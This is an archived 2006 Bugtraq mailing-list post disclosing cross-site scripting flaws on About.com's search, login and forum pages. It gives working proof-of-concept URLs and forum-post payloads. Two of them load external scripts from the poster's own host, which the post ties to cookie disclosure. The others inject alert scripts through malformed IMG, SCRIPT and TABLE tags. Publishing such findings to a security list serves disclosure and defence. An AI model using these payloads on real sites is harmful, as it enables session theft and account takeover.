About.com - XSS with cookie disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: About.com - XSS with cookie disclosure
From: luny@xxxxxxxxxxxxxxx
Date: 13 Jun 2006 06:36:49 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

About.com

Homepage:
http://www.about.com

Effected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
-----------------------------------

Search input box xss vuln with cookie disclosure:
Works by putting the <script> tags in the input box, or doing url injection. 
There seemsto be no sanatizing user input here. PoC:
http://search.about.com/fullsearch.htm?terms=<script%20src=http://www.youfucktard.com/xs.js></script>

Screenshots:
http://www.youfucktard.com/xsp/about1.jpg
http://www.youfucktard.com/xsp/about2.jpg

-----------------------------------------

Shortform.htm XSS vuln no filter evasion needed:
http://login.about.com/shortform.htm?Error=<SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/about3.jpg

---------------------------------------------

Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script 
tags:

PoC:
http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=<IMG%20"""><SCRIPT></SCRIPT>">1&tid=1456">">"><"">'>'>'><"<IMG%20"""><IMG%20"""><SCRIPT></SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>">"><"<"<"<"<""><"<"<'<'&webtag=ab-vgstrategies

------------------------------------------------------

Profile_center.asp xss vuln:

http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgstrategies&cType=2&uName=jonne1234";>">"><IMG%20SRC=javascript:alert('XSS')><"<"<"&dMode=0&eBtn=0&uid=1574961808

------------------------------------------------------

Posting in the forum XSS vuln. This time we'll use the allowed tags <table>. 
For PoC try posting this in the forum:

<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<TABLE BACKGROUND="javascript:alert('XSS')">

Screenshots:
http://www.youfucktard.com/xsp/about4.jpg
http://www.youfucktard.com/xsp/about5.jpg

Prev by Date: Macworld.com - XSS vulnerability
Next by Date: Ratemylook.co.uk - XSS with session disclosure
Previous by thread: Macworld.com - XSS vulnerability
Next by thread: Ratemylook.co.uk - XSS with session disclosure
Index(es):
- Date
- Thread